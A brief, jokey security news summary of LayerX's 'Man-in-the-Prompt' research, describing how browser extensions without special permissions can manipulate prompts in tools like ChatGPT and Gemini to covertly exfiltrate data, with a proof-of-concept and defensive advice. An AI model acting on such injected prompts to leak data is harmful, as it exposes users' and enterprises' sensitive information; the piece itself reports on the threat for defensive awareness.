Man-in-the-Prompt: The Hilarious Plot Twist in AI Security’s Worst Nightmare!
Beware the Man-in-the-Prompt! LayerX reveals a new attack method against popular gen-AI tools using browser extensions. Even without special permissions, extensions can access AI tools like ChatGPT and Gemini to exfiltrate data. Enterprises, check those extensions or risk turning your AI assistant into an unintentional blabbermouth!

Hot Take:
When browser extensions go rogue, it’s like inviting a vampire into your home—except the vampire is siphoning off your corporate secrets. Who knew a bit of code could be such a charming bloodsucker?
Key Points:
- LayerX exposes a new attack method called “Man-in-the-Prompt” targeting gen-AI tools.
- Browser extensions, even those without special permissions, can manipulate AI prompts for data exfiltration.
- The attack is a significant threat to enterprise-customized LLMs dealing with sensitive data.
- Proof-of-concept demonstrates covert data exfiltration from ChatGPT and Google’s Gemini.
- LayerX sees this as a weakness, not a vulnerability, and recommends monitoring DOM interactions and blocking risky extensions.
Already a member? Log in here